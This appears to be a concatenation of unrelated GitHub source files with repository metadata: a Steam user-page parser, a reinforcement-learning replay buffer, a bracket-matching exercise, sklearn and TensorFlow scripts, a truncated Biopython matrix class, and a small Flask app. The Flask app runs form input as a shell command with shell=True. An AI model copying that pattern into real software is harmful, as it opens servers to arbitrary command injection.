4e5035989a8b27bbf1e9c337ad7aa29d4a3dde48 | d654f11c3e1b0fbcfd83926ae437190e05cdcd13 | /src/scraping/process_raw_user_scraping.py | ac5c77f9bad3aded053bed62ecddcb211cfa7378 | [] | no_license | pixelatedbrian/Indie-Game-Recommender | b06d6c1cc36d91781cedeaf4ace85a7e32219300 | 76fb770b221841d44b5d45bd1782077779ee29a3 | refs/heads/master | 2018-09-23T22:59:13.190148 | 2018-06-15T20:54:15 | 2018-06-15T20:54:15 | 95,802,004 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 5,406 | py | '''
Read in raw user webpages from MongoDB and extract the games that the user
has played as well as how many hours the user has played each game
Create a master dictionary that contains the user_id: val for one key/value
pair and then create a data: {} key/value pair where the dictionary value is
a dictionary of the game titles that a user has and then the hours that the
user has played the game.
'''
# import MongoDB modules
from pymongo import MongoClient
# can always use more time
import time
def insert(collection, dictionary, match_key):
    '''
    Abstracted insert method which, attempts to add the dictionary to the
    provided collection in MongoDB.
    The method attempts to avoid duplicate inserts by checking the collection
    to see if there's already an item who's key matches the one being inserted.
    If there is a matching item then the new one is not inserted.
    '''
    # Only insert when no existing document shares the same match_key value.
    # NOTE(review): find_one + insert_one is not atomic; a concurrent writer
    # could still create a duplicate. A unique index would be safer.
    if not collection.find_one({match_key: dictionary[match_key]}):
        try:
            collection.insert_one(dictionary)
            print "inserted", dictionary[match_key]
        except Exception, e:
            print "Execption when attempting to insert into collection:", e
    else:
        print match_key, "already exists"
def get_userinfo_from_doc(document):
    '''
    Extracts the user info from the user all games owned website into a dictionary with the username as one
    key/value and then a list of user_game_data as the user_game_data value.
    Ex: {"user": "bob", user_game_data: [{game_1}, {game_2"}, {etc}]}
    Ex: game_1 = {"game_name":_name, "app_id":_appid, "hours_played":_hours_played, "last_played":_last_played}
    returns:
    the dictionary specified above (or None if the raw page cannot be parsed)
    '''
    data = document["data"].lower()
    try:
        # remove useless front part of data
        data = data[data.index("var rggames = [".lower()):(3+data.index("}}];".lower()))]
        # attempt to split the block of game info into sub-blocks specific to each game
        raw_user_game_data = data.split("},{")
        # be overly explicit in where each variable will be stored which will assemble
        # the dictionary specific for each user's game playtime, name, etc
        # _name = ""
        # _appid = ""
        # _hours_played = ""
        # _last_played = ""
        # make a list to hold the individual game info dictionaries
        game_info = []
        # raw_user_data is a list of game data so walk over that and process each
        # item into a dictionary to be added to the overall user profile
        for raw_game_info in raw_user_game_data:
            # split the individual raw_game_info into each specific attribute
            raw_game_attributes = raw_game_info.split(",")
            # walk all of the attributes
            for item in raw_game_attributes:
                # print attribute
                if "appid" in item:
                    _appid = item.split(":")[1]
                if "name" in item:
                    _name = item[7:]
                if "hours_forever" in item:
                    _hours_played = float(item.split(":")[1].strip('"'))
                if "last_played" in item:
                    _last_played = int(item.split(":")[1])
            # NOTE(review): if a game block is missing one of the fields, the
            # value from the PREVIOUS iteration is silently reused (or a
            # NameError occurs on the first game) — confirm this is acceptable.
            this_game_info_dict = {"game_name":_name, "app_id":_appid, "hours_played":_hours_played, "last_played":_last_played}
            #print
            game_info.append(this_game_info_dict)
            #print this_game_info_dict
            #print sub_info
        # make the total player game data dictionary:
        player_dict = {"player":document["user"], "game_data": game_info}
        # return to caller
        return player_dict
    except Exception, e:
        print "Failed to process user_page:", document["user"]
        return None
def digest_user_info_into_collection(source_collection, destination_collection):
    '''
    Takes in a source collection of MongoDB. For each document in that collection
    call get_userinfo_from_doc to extract the data that we need. Temporarily
    store that information and then insert it into the destination_collection.
    '''
    start_size = destination_collection.find().count()
    print "Length of destination collection at start:", start_size
    print
    # pause for a few seconds so user can see starting size of collection
    time.sleep(3)
    # loop over source_collection
    for doc in source_collection.find():
        # extract data from raw web page into a dictionary
        temp_data = get_userinfo_from_doc(doc)
        # make sure that processing didn't fail
        if temp_data != None:
            # add the cleaned data to the proper collection
            insert(destination_collection, temp_data, "player")
    # after the work is done check the finished size
    final_size = destination_collection.find().count()
    # print how many items were added to the collection
    print
    print "Added", final_size - start_size, "to the collection."
if __name__ == '__main__':
    # Entry point: digest every raw scraped user page into the cleaned
    # per-player collection.
    # connect to the hosted MongoDB instance with the database that we want
    db = MongoClient('mongodb://localhost:27017/')["capstone"]
    # collection to pull scraped information from
    source_collection = db.raw_user_scrape
    # collection to store digested information in
    dest_collection = db.user_data_digest
    digest_user_info_into_collection(source_collection, dest_collection)
| [
"bhardens@yahoo.com"
] | bhardens@yahoo.com |
503494cb23fd10bfb9415c87cba1dfd294b8102b | cf8c6085efbe3a599415f99752b2563dec88be0b | /navigation/utils/replay_buffer.py | 9f8146a2fd1054ad411ac7aba6f26057062c2c8b | [] | no_license | NehrenD/deeprl_nanodegree | 7e631c0dd2d377846997d3f7c59d60348929ada2 | 7ea5f122f90db25bd03b3bdcc77e1abdbbd0c7a8 | refs/heads/master | 2022-11-14T16:19:39.051344 | 2020-07-13T21:49:33 | 2020-07-13T21:49:33 | 263,177,892 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,762 | py | import torch
from collections import deque,namedtuple
import numpy as np
device = 'cpu'
class ReplayBuffer:
    """Fixed-size buffer storing experience tuples for DQN-style training."""
    def __init__(self, action_size, buffer_size, batch_size, seed):
        # action_size: size of the action space (stored for reference only)
        # buffer_size: max experiences retained; oldest are dropped (deque)
        # batch_size: number of experiences returned by sample()
        # NOTE(review): seeding numpy's *global* RNG here affects every numpy
        # consumer in the process, not just this buffer.
        self.action_size = action_size
        self.memory = deque(maxlen=buffer_size)
        self.batch_size = batch_size
        self.experience = namedtuple("Experience", field_names=["state", "action", "reward", "next_state", "done"])
        np.random.seed(seed)
    def add(self, state, action, reward, next_state, done):
        """Add a new experience to memory."""
        e = self.experience(state, action, reward, next_state, done)
        self.memory.append(e)
    def sample(self):
        """Randomly sample a batch of experiences from memory."""
        # Indices are drawn WITH replacement, so a batch may repeat entries.
        experiences = [self.memory[idx] for idx in
                       np.random.choice(list(range(len(self.memory))), size=self.batch_size)]
        # experiences = np.random.choice(self.memory, size=self.batch_size)
        # Stack each field across the batch into (batch, ...) torch tensors.
        states = torch.from_numpy(np.vstack([e.state for e in experiences if e is not None])).float().to(device)
        actions = torch.from_numpy(np.vstack([e.action for e in experiences if e is not None])).long().to(device)
        rewards = torch.from_numpy(np.vstack([e.reward for e in experiences if e is not None])).float().to(device)
        next_states = torch.from_numpy(np.vstack([e.next_state for e in experiences if e is not None])).float().to(
            device)
        dones = torch.from_numpy(np.vstack([e.done for e in experiences if e is not None]).astype(np.uint8)).float().to(
            device)
        return (states, actions, rewards, next_states, dones)
    def __len__(self):
        """Return the current size of internal memory."""
        return len(self.memory) | [
"thenehrens@yahoo.com"
] | thenehrens@yahoo.com |
0bb69fd3581d92903e2200dd01a5cf67f1215a6a | 912945a58d485956f5222bad7adc1930f61d1593 | /TIL/SWEA/D2/swea_4866.py | 302fd69a1b5120dedec668f68c3f3ea91d18437a | [] | no_license | jeong-hyejin/Algorithm | 27a36b4dedde37a59f2318204c7d724e79ebec4b | 2e4654cfb6ba2448e217c5819e0582749b14d487 | refs/heads/master | 2022-12-17T16:19:11.862171 | 2020-09-22T14:37:11 | 2020-09-22T14:37:11 | 286,981,923 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,257 | py | '''
While iterating over the input: push '(' and '{' onto the stack.
For ')' and '}': pop only if 1) the stack is non-empty and 2) the top of the stack is the matching opener.
After the scan, return 0 if the stack is non-empty, otherwise return 1.
'''
T = int(input())
for tc in range(1, T+1):
    print('#{}'.format(tc), end=" ")
    # NOTE(review): check() is redefined on every test case; it could be
    # hoisted above the loop.
    def check(arr):
        stack = []
        for i in arr:
            # if i == '(' or c == '{':
            #     stack.append(i)
            if i == '(':
                stack.append(i)
            elif i == '{':
                stack.append(i)
            elif i == ')':
                if stack:
                    if stack[-1] == '(':
                        stack.pop(-1)
                        continue
                    if stack[-1] == '{':
                        return 0
                else:
                    return 0
            elif i == '}':
                if stack:
                    if stack[-1] == '{':
                        stack.pop(-1)
                        continue
                    if stack[-1] == '(':
                        return 0
                else:
                    # NOTE(review): a '}' with an empty stack is skipped here
                    # while ')' with an empty stack returns 0 — asymmetry that
                    # looks unintentional; confirm against the problem spec.
                    continue
        if stack:
            return 0
        else:
            return 1
    arr = input()
    print(check(arr)) | [
"9jung6@naver.com"
] | 9jung6@naver.com |
a015c92f8a50466142a0f27f917b1554f064396c | da0a4ddb0b8e97574a60fc4b2d7eddfafc2d39c3 | /arg_parse.py | 33cb69891ec4a42aeb5e20f138cc79be09db2bab | [] | no_license | jmccutchan/GA_homework | 577221297ffc10f0a173af101252d07c21222473 | 60c15feb222b00c92bef8b0c7e6523d1fb98aec4 | refs/heads/master | 2021-01-21T00:21:13.096333 | 2014-03-07T07:24:43 | 2014-03-07T07:24:43 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 2,182 | py | import argparse
from sklearn import datasets
from sklearn.neighbors import KNeighborsClassifier
from sklearn.naive_bayes import GaussianNB
from sklearn import cross_validation
import numpy as np
def loadIris(): #returns the data and labels for the iris dataset
    '''Return (data, labels) for the sklearn iris dataset.'''
    iris=datasets.load_iris() #load the needed dataset
    irisX = iris.data #the data is four columns per record - petal length/width
                      #and sepal length/width
    irisY = iris.target #this is the classification to iris types
                       #(Setosa, Versicolour, and Virginica)
    return irisX,irisY
def makeKNN():
    """Build and return a fresh default-parameter KNN classifier."""
    return KNeighborsClassifier()
def makeBayes():
    """Build and return a fresh Gaussian naive-Bayes classifier."""
    return GaussianNB()
def doCrossVal(nfold,func,dataX,dataY):
    #Performs cross validation for Bayes or KNN
    #given the number of folds to partition the input data into
    '''Return the per-fold accuracy scores of classifier factory `func`
    under nfold-fold cross validation on (dataX, dataY).'''
    classifier=func()
    np.random.seed() #initialize random number generator
    #cross_val_score trains the appropriate model and performs cross validation
    #giving the accuracy score for each fold
    # NOTE(review): sklearn.cross_validation is the pre-0.18 API, removed in
    # modern sklearn (now sklearn.model_selection).
    scores=cross_validation.cross_val_score(classifier,dataX,dataY,
                                            cv=nfold,scoring='accuracy')
    return scores
# Fold counts to evaluate for both classifiers.
folds= [2,3,5,10,15,30,50,75]
irisX,irisY=loadIris()
parser = argparse.ArgumentParser()
# NOTE(review): two greedy positionals with nargs="*" — the first ("knn")
# swallows all command-line tokens, so the "nb" branch below is only reached
# when no arguments are given at all; likely not the intended CLI.
parser.add_argument("knn",nargs="*")
parser.add_argument("nb",nargs="*")
args = parser.parse_args()
if args.knn:
    for n in folds:
        print "\nPerforming {}-fold cross-validation using a KNN calssifier:".format(n)
        scores=doCrossVal(n,makeKNN,irisX,irisY)
        print "The accuracies for each fold-test are: "+ ",".join(map(str,scores))
        print "The mean accuracy of the KNN classifier is {}".format(scores.mean())
elif args.nb:
    for n in folds:
        print "\nPerforming {}-fold cross-validation using a Bayesian calssifier:".format(n)
        scores=doCrossVal(n,makeBayes,irisX,irisY)
        print "The accuracies for each fold-test are: "+ ",".join(map(str,scores))
        print "The mean accuracy of the Bayesian classifier is {}".format(scores.mean())
| [
"mccutchanjames@gmail.com"
] | mccutchanjames@gmail.com |
e14cf92464ea50f5d578c4e36687e6ec65a07426 | 2511ad2a4e41c17c5c76b353de855090e23d45f5 | /app.py | e8afbc61c64f9211f387459265bda884d17395a7 | [] | no_license | alexbumpers/stract | 15c950ed43ce58cb1f492d169f70d3b5d42d3a6c | f847867d3197cdf87fc49e26bd2d78178f9390a3 | refs/heads/master | 2020-05-07T21:56:08.558661 | 2019-04-13T04:19:45 | 2019-04-13T04:19:45 | 180,925,050 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,112 | py | from flask import Flask, request, render_template
import os
import subprocess
import logging
# Verbose logging for development; includes Flask/werkzeug messages.
logging.basicConfig(level=logging.DEBUG)
app = Flask(__name__)
if __name__ == '__main__':
    # Reload templates on change during development.
    app.jinja_env.auto_reload = True
    app.config['TEMPLATES_AUTO_RELOAD'] = True
    # BUG FIX: host must be a bare interface address; the port is a separate
    # keyword argument. host='0.0.0.0:3000' makes the socket bind fail.
    # NOTE(review): when this file is run as a script this guard executes
    # before the routes below are defined, so app.run() blocks with no routes
    # registered — consider moving the guard to the bottom of the file.
    app.run(debug=True, host='0.0.0.0', port=3000)
def write_to_history(shell_data):
    """Append a single executed command line to history.txt.

    :param shell_data: the command string to record; a newline is appended.
    """
    # Context manager guarantees the handle is flushed and closed even if the
    # write raises (the original left the file handle open).
    with open("history.txt", "a") as f:
        f.write(shell_data + "\n")
# Currently no error handling, so non-commands will fail non-gracefully.
def execute_command(command):
    """Run *command* in a shell, appending the command and its stdout to
    shell.txt, then record it in history.txt on success.

    SECURITY NOTE: ``shell=True`` with user-supplied input allows arbitrary
    command injection — this must never be exposed to untrusted clients.
    """
    # 'with' closes the log even when check_call raises (the original leaked
    # the handle on failure because close() was unreachable after the raise).
    with open("shell.txt", "a") as f:
        f.write(command + '\n')
        subprocess.check_call('{}'.format(command), shell=True, stdout=f)
        write_to_history(command)
@app.route('/', methods=['GET', 'POST'])
def lsof_output():
    # GET: render the accumulated shell output; POST: run the submitted
    # command first, then render the refreshed output.
    if request.method == 'GET':
        op = open("shell.txt", "r").read()
        return render_template('index.html', output=op)
    if request.method == 'POST':
        # NOTE(review): the form field is named 'port' but carries an
        # arbitrary shell command line — confirm intent against the template.
        port = request.form.to_dict()
        port = port['port']
        execute_command(port)
        op = open("shell.txt", "r").read()
        return render_template('index.html', output=op) | [
"apbumpers@gmail.com"
] | apbumpers@gmail.com |
255a081f17a2d0cc12397f5c24ab00bc3d57e454 | b5611baa02848546b0f25b16ceb24e5864afefee | /4-3/sunset.py | 843c9fd19ce645473b7a0132ad7c3f90fe554f7d | [] | no_license | codingfan0704/hajimeteno_computer_sience | 59920c6a91f72608bc46b4fa22941609291ba7bb | 7f674a2981b0ba3a9101672597f0ae42b190a409 | refs/heads/master | 2020-04-18T21:54:57.067407 | 2012-01-26T10:30:27 | 2012-01-26T10:30:27 | 3,271,668 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 288 | py | #encoding: utf8
import media
# Darken the blue and green channels of every pixel by 30% to give the
# photo a warm, sunset-like tint (the red channel is left untouched).
pic = media.load_picture('207.jpg')
media.show(pic)
for p in media.get_pixels(pic):
    new_blue = int(0.7 * media.get_blue(p))
    new_green = int(0.7 * media.get_green(p))
    media.set_blue(p, new_blue)
    media.set_green(p, new_green)
media.show(pic) | [
"coding6935fan@gmail.com"
] | coding6935fan@gmail.com |
7a6974e07b365dfc148c9dc74ab452fd7af7203b | e13b7175ea8b863ab055f8e78b561512e2d4819a | /code/kmeans.py | da4aee6cbfe4186aea8e3fd5223c73d49d99f76f | [
"MIT"
] | permissive | UF-AI/2018DataScienceBowl | 5d6c95c54353534fe9d8c360bb8f34af631a5de4 | 954fbd59c9cd3621d8dc94d48fdf9b1da0e43d1d | refs/heads/master | 2021-05-10T09:23:47.146371 | 2018-01-25T16:40:26 | 2018-01-25T16:40:26 | 118,926,273 | 0 | 1 | null | null | null | null | UTF-8 | Python | false | false | 6,740 | py | # -*- coding: utf-8 -*-
"""
Created on Sat Jan 20 00:57:24 2018
@author: mason rawson
"""
import tensorflow as tf
import os
import sys
import numpy as np
import random
import math
import warnings
import pandas as pd
import sklearn
from sklearn.decomposition import PCA
from sklearn.cluster import KMeans
#import cv2
import matplotlib.pyplot as plt
from skimage.io import imread, imshow, imread_collection, concatenate_images,show
from skimage.transform import resize
from skimage.morphology import label
from itertools import chain
#%%
# Set some parameters
IMG_WIDTH = 350     # resize target width (pixels)
IMG_HEIGHT = 350    # resize target height (pixels)
IMG_CHANNELS = 3    # colour channels kept when reading each PNG
# NOTE(review): paths assume the 2018 Data Science Bowl input layout -- confirm.
TRAIN_PATH = './Dropbox/projects/dataSciBowl2018/input/train/'
TEST_PATH = './Dropbox/projects/dataSciBowl2018/input/test/'
warnings.filterwarnings('ignore', category=UserWarning, module='skimage')

# Seed the RNGs for reproducibility.  The original wrote
# ``random.seed = seed`` and ``np.random.seed = seed``, which REBIND the
# seed functions instead of calling them, so neither RNG was ever seeded.
seed = 42
random.seed(seed)
np.random.seed(seed)
#%%
# Get train and test IDs (each sample lives in its own sub-directory).
train_ids = next(os.walk(TRAIN_PATH))[1]
test_ids = next(os.walk(TEST_PATH))[1]
# Get and resize train images and masks
#images = np.zeros((len(train_ids), IMG_HEIGHT, IMG_WIDTH, IMG_CHANNELS), dtype=np.uint8)
# One greyscale uint8 image per training id (3-D: sample, row, col).
images = np.zeros((len(train_ids), IMG_HEIGHT, IMG_WIDTH), dtype=np.uint8)
# Combined binary nucleus mask for each image.
# NOTE(review): np.bool is deprecated/removed in modern NumPy -- use bool.
labels = np.zeros((len(train_ids), IMG_HEIGHT, IMG_WIDTH, 1), dtype=np.bool)
#images, labels
#%%
for i in range(len(train_ids)):
    id_ = train_ids[i]
    path = TRAIN_PATH + id_
    img = imread(path + '/images/' + id_ + '.png')[:,:,:IMG_CHANNELS]
    #img = imread(path + '/images/' + id_ + '.png', as_grey=True)[:,:]
    img = resize(img, (IMG_HEIGHT, IMG_WIDTH), mode='constant', preserve_range=True)
    # Collapse RGB to grey by averaging the channels into channel 0.
    # NOTE(review): both loops use IMG_WIDTH -- assumes a square image.
    for rownum in range(IMG_WIDTH):
        for colnum in range(IMG_WIDTH):
            img[rownum,colnum,0] = np.average(img[rownum,colnum,:])
    images[i] = img[:,:,0]
    # Union of all per-nucleus masks for this sample.
    mask = np.zeros((IMG_HEIGHT, IMG_WIDTH, 1), dtype=np.bool)
    for mask_file in next(os.walk(path + '/masks/'))[2]:
        mask_ = imread(path + '/masks/' + mask_file)
        mask_ = np.expand_dims(resize(mask_, (IMG_HEIGHT, IMG_WIDTH), mode='constant',
                                      preserve_range=True), axis=-1)
        mask = np.maximum(mask, mask_)
    labels[i] = mask
#%%
# NOTE(review): this cell looks dead/broken -- ``images`` is 3-D here, so
# ``images[i,rownum,colnum,:]`` and ``images[i,:,:,0]`` would raise
# IndexError; it appears left over from the earlier 4-D (RGB) version.
for i in range(len(train_ids)):
    grey = np.zeros([IMG_WIDTH, IMG_WIDTH]) # init 2D numpy array
    # get row number
    for rownum in range(IMG_WIDTH):
        for colnum in range(IMG_WIDTH):
            grey[rownum,colnum] = np.average(images[i,rownum,colnum,:])
    images[i,:,:,0] = grey
#%%
# 90/10 train/validation split; masks cast to float32 for the MSE loss.
X_train = images[:int(0.9*len(train_ids)),:,:]
Y_train = labels[:int(0.9*len(train_ids)),:,:]
Y_train = Y_train.astype(np.float32)
X_validate = images[int(0.9*len(train_ids)):,:,:]
Y_validate = labels[int(0.9*len(train_ids)):,:,:]
Y_validate = Y_validate.astype(np.float32)
#%%
# Load and resize the test images, recording each original size so the
# predicted masks can later be scaled back up for submission.
X_test = np.zeros((len(test_ids), IMG_HEIGHT, IMG_WIDTH, IMG_CHANNELS), dtype=np.uint8)
sizes_test = []
for i in range(len(test_ids)):
    id_ = test_ids[i]
    path = TEST_PATH + id_
    img = imread(path + '/images/' + id_ + '.png')[:,:,:IMG_CHANNELS]
    sizes_test.append([img.shape[0], img.shape[1]])
    img = resize(img, (IMG_HEIGHT, IMG_WIDTH), mode='constant', preserve_range=True)
    X_test[i] = img
#%%
def shuffle():
    """Re-shuffle the module-level ``images``/``labels`` arrays in unison.

    Draws a single random permutation of the training set and applies it to
    both ``X_train`` and ``Y_train`` so image/mask pairs stay aligned.
    """
    global images, labels
    order = np.random.permutation(len(X_train))
    images = X_train[order]
    labels = Y_train[order]
def next_batch(batch_s, iters):
    """Return the ``iters``-th mini-batch of ``batch_s`` image/mask pairs.

    Triggers a fresh shuffle at the start of every epoch (``iters == 0``),
    then slices the shuffled module-level ``images``/``labels`` arrays.
    """
    if iters == 0:
        shuffle()
    start = batch_s * iters
    stop = start + batch_s
    return images[start:stop], labels[start:stop]
#%%
# Quick PCA sanity check on the last image left in ``img`` by the loading
# loop (``data_`` is unused scratch data; results are not stored).
data_ = np.array([[-1, -1], [-2, -1], [-3, -2], [1, 1], [2, 1], [3, 2]])
pca = PCA(n_components=20)
pca.fit(img[:,:,0])
pca.explained_variance_ratio_
pca.fit_transform(img[:,:,0])
#%%
PICS = 25            # number of training pictures used for clustering
BOX = IMG_WIDTH/10   # side length of each statistics box
IMG_CHANNELS = 1     # NOTE(review): rebinds the global channel count to 1
#%%
STRIDE = BOX
# Per-box mean and variance features over the first PICS training images.
avg = np.zeros([PICS,int(IMG_WIDTH/BOX),int(IMG_HEIGHT/BOX),IMG_CHANNELS])
var = np.zeros([PICS,int(IMG_WIDTH/BOX),int(IMG_HEIGHT/BOX),IMG_CHANNELS])
for im_idx in range(PICS):
    # for ch in range(IMG_CHANNELS):
    for w in range(int(IMG_WIDTH/BOX)):
        for h in range(int(IMG_HEIGHT/BOX)):
            avg[im_idx,w,h] = np.average(X_train[im_idx,int(w*BOX):int((w+1)*BOX),int(h*BOX):int((h+1)*BOX)])
            var[im_idx,w,h] = np.var(X_train[im_idx,int(w*BOX):int((w+1)*BOX),int(h*BOX):int((h+1)*BOX)])
#%%
# Flatten per-image box statistics and concatenate [mean | variance].
avg_samp = np.zeros([PICS,int((IMG_WIDTH/BOX) * (IMG_HEIGHT/BOX) * IMG_CHANNELS)])
var_samp = np.zeros([PICS,int((IMG_WIDTH/BOX) * (IMG_HEIGHT/BOX) * IMG_CHANNELS)])
for pics in range(PICS):
    avg_samp[pics,:] = avg[pics,:,:,:].flatten()
    var_samp[pics,:] = var[pics,:,:,:].flatten()
features = np.append(avg_samp,var_samp,axis=1)
#%%
# Cluster the images into 10 groups by their box statistics
# (cluster assignments only; result is not used further below).
kmeans = KMeans(n_clusters=10).fit_predict(features)
#%%
# Graph inputs: RGB image batch, binary mask batch, learning rate.
X_tf = tf.placeholder(tf.float32, [None, IMG_WIDTH, IMG_HEIGHT, 3])
Y_tf = tf.placeholder(tf.float32, [None, IMG_WIDTH, IMG_HEIGHT, 1])
lr = tf.placeholder(tf.float32)
#%%
def deconv2d(input_tensor, filter_size, output_size, out_channels, in_channels, name):
    """Transposed 2-D convolution (stride 2, VALID padding).

    Upsamples ``input_tensor`` to a square ``output_size`` x ``output_size``
    map with ``out_channels`` channels, using a learned filter variable
    registered under ``name``.
    """
    batch = tf.shape(input_tensor)[0]
    target_shape = tf.stack([batch, output_size, output_size, out_channels])
    kernel = tf.get_variable(
        name=name,
        shape=[filter_size, filter_size, out_channels, in_channels])
    return tf.nn.conv2d_transpose(
        input_tensor, kernel, target_shape, [1, 2, 2, 1], padding='VALID')
# Encoder: one 3x3 conv followed by three strided convolutions.
Y1 = tf.layers.conv2d(X_tf, filters=16, kernel_size=3, strides=1, padding="VALID", activation=tf.nn.relu)
Y2 = tf.layers.conv2d(Y1, filters=32, kernel_size=2, strides=2, padding="VALID", activation=tf.nn.relu)
Y3 = tf.layers.conv2d(Y2, filters=64, kernel_size=3, strides=2, padding="VALID", activation=tf.nn.relu)
Y4 = tf.layers.conv2d(Y3, filters=64, kernel_size=3, strides=2, padding="VALID", activation=tf.nn.relu)
# Decoder: transposed convolutions back up to the 350x350 mask logits.
Y3_ = deconv2d(Y4, 4, 32, 32, 64, "Y3_deconv")
Y3_ = tf.nn.relu(Y3_)
Y2_ = deconv2d(Y3_, 2, 64, 16, 32, "Y2_deconv")
Y2_ = tf.nn.relu(Y2_)
logits = deconv2d(Y2_, 2, 350, 1, 16, "logits_deconv")
#%%
# Pixel-wise mean-squared error against the binary mask.
loss = tf.reduce_mean(tf.square(Y_tf - logits))
optimizer = tf.train.AdamOptimizer(lr).minimize(loss)
# init
init = tf.global_variables_initializer()
sess = tf.Session()
sess.run(init)
iter_count = 0
for i in range(12000):
    # training on batches of 5 images with 5 mask images
    if(iter_count > 120):
        iter_count = 0
    batch_X, batch_Y = next_batch(5, iter_count)
    iter_count += 1
    feed_dict = {X_tf: batch_X, Y_tf: batch_Y, lr: 0.0001}
    # NOTE(review): only ``loss`` is evaluated here -- ``optimizer`` is never
    # run, so no gradient step is actually taken.  ``loss_value`` is a
    # one-element list because sess.run is given a list of fetches.
    loss_value = sess.run([loss], feed_dict=feed_dict)
    if(i % 500 == 0):
        print("training loss:", str(loss_value))
        #print("training acc:" + str(acc))
#test_data = {X: X_validate, Y_: Y_validate}
#test_acc, tests_loss = sess.run([accuracy, loss], feed_dict=test_data)
print("Done!")
#%%
"christian.marin7@gmail.com"
] | christian.marin7@gmail.com |
4142964e5405ab44216a3c53d6d75234942ac6d4 | 76a8ea60480331f0f61aeb61de55be9a6270e733 | /downloadable-site-packages/Bio/Phylo/TreeConstruction.py | c6c95154385d69c86f76450b142cbf940399a862 | [
"MIT"
] | permissive | bhagyas/Pyto | cd2ec3f35bec703db4ac29b56d17abc4bf03e375 | 907024a9b3e04a2a9de54976778c0e1a56b7b83c | refs/heads/master | 2022-11-19T13:05:07.392454 | 2020-07-21T17:33:39 | 2020-07-21T17:33:39 | 281,886,535 | 2 | 0 | MIT | 2020-07-23T07:48:03 | 2020-07-23T07:48:02 | null | UTF-8 | Python | false | false | 42,982 | py | # Copyright (C) 2013 by Yanbo Ye (yeyanbo289@gmail.com)
# This code is part of the Biopython distribution and governed by its
# license. Please see the LICENSE file that should have been included
# as part of this package.
"""Classes and methods for tree construction."""
import itertools
import copy
from Bio.Phylo import BaseTree
from Bio.Align import MultipleSeqAlignment
from Bio.SubsMat import MatrixInfo
from Bio import _py3k
from Bio._py3k import zip, range
def _is_numeric(x):
"""Return True if is numeric."""
return _py3k._is_int_or_long(x) or isinstance(x, (float, complex))
class _Matrix(object):
    """Base class for distance matrix or scoring matrix.

    Only the lower triangle is stored; the matrix is treated as symmetric.

    Accepts a list of names and a lower triangular matrix.::

        matrix = [[0],
                  [1, 0],
                  [2, 3, 0],
                  [4, 5, 6, 0]]

    represents the symmetric matrix of::

        [0,1,2,4]
        [1,0,3,5]
        [2,3,0,6]
        [4,5,6,0]

    :Parameters:
        names : list
            names of elements, used for indexing
        matrix : list
            nested list of numerical lists in lower triangular format

    Examples
    --------
    >>> from Bio.Phylo.TreeConstruction import _Matrix
    >>> names = ['Alpha', 'Beta', 'Gamma', 'Delta']
    >>> matrix = [[0], [1, 0], [2, 3, 0], [4, 5, 6, 0]]
    >>> m = _Matrix(names, matrix)
    >>> m
    _Matrix(names=['Alpha', 'Beta', 'Gamma', 'Delta'], matrix=[[0], [1, 0], [2, 3, 0], [4, 5, 6, 0]])

    You can use two indices to get or assign an element in the matrix.

    >>> m[1,2]
    3
    >>> m['Beta','Gamma']
    3
    >>> m['Beta','Gamma'] = 4
    >>> m['Beta','Gamma']
    4

    Further more, you can use one index to get or assign a list of elements
    related to that index.

    >>> m[0]
    [0, 1, 2, 4]
    >>> m['Alpha']
    [0, 1, 2, 4]
    >>> m['Alpha'] = [0, 7, 8, 9]
    >>> m[0]
    [0, 7, 8, 9]
    >>> m[0,1]
    7

    Also you can delete or insert a column&row of elements by index.

    >>> m
    _Matrix(names=['Alpha', 'Beta', 'Gamma', 'Delta'], matrix=[[0], [7, 0], [8, 4, 0], [9, 5, 6, 0]])
    >>> del m['Alpha']
    >>> m
    _Matrix(names=['Beta', 'Gamma', 'Delta'], matrix=[[0], [4, 0], [5, 6, 0]])
    >>> m.insert('Alpha', [0, 7, 8, 9] , 0)
    >>> m
    _Matrix(names=['Alpha', 'Beta', 'Gamma', 'Delta'], matrix=[[0], [7, 0], [8, 4, 0], [9, 5, 6, 0]])

    """

    def __init__(self, names, matrix=None):
        """Initialize matrix.

        Arguments are a list of names, and optionally a list of lower
        triangular matrix data (zero matrix used by default).
        """
        # check names: must be a list of unique strings
        if isinstance(names, list) and all(isinstance(s, str) for s in names):
            if len(set(names)) == len(names):
                self.names = names
            else:
                raise ValueError("Duplicate names found")
        else:
            raise TypeError("'names' should be a list of strings")
        # check matrix
        if matrix is None:
            # create a new one with 0 if matrix is not assigned
            matrix = [[0] * i for i in range(1, len(self) + 1)]
            self.matrix = matrix
        else:
            # check if all elements are numbers
            if (isinstance(matrix, list) and
                    all(isinstance(l, list) for l in matrix) and
                    all(_is_numeric(n) for n in [item for sublist in matrix
                                                 for item in sublist])):
                # check if the same length with names
                if len(matrix) == len(names):
                    # check if is lower triangle format
                    if [len(m) for m in matrix] == list(range(1, len(self) + 1)):
                        self.matrix = matrix
                    else:
                        raise ValueError(
                            "'matrix' should be in lower triangle format")
                else:
                    raise ValueError(
                        "'names' and 'matrix' should be the same size")
            else:
                raise TypeError("'matrix' should be a list of numerical lists")

    def __getitem__(self, item):
        """Access value(s) by the index(s) or name(s).

        For a _Matrix object 'dm'::

            dm[i]                 get a value list from the given 'i' to others;
            dm[i, j]              get the value between 'i' and 'j';
            dm['name']            map name to index first
            dm['name1', 'name2']  map name to index first
        """
        # Handle single indexing
        if isinstance(item, (int, str)):
            index = None
            if isinstance(item, int):
                index = item
            elif isinstance(item, str):
                if item in self.names:
                    index = self.names.index(item)
                else:
                    raise ValueError("Item not found.")
            else:
                raise TypeError("Invalid index type.")
            # check index
            if index > len(self) - 1:
                raise IndexError("Index out of range.")
            # Assemble the full row from the stored lower triangle: entries
            # left of the diagonal come from row `index`, the remainder from
            # column `index`.
            return [self.matrix[index][i] for i in range(0, index)] + [
                self.matrix[i][index] for i in range(index, len(self))]
        # Handle double indexing
        elif len(item) == 2:
            row_index = None
            col_index = None
            if all(isinstance(i, int) for i in item):
                row_index, col_index = item
            elif all(isinstance(i, str) for i in item):
                row_name, col_name = item
                if row_name in self.names and col_name in self.names:
                    row_index = self.names.index(row_name)
                    col_index = self.names.index(col_name)
                else:
                    raise ValueError("Item not found.")
            else:
                raise TypeError("Invalid index type.")
            # check index
            if row_index > len(self) - 1 or col_index > len(self) - 1:
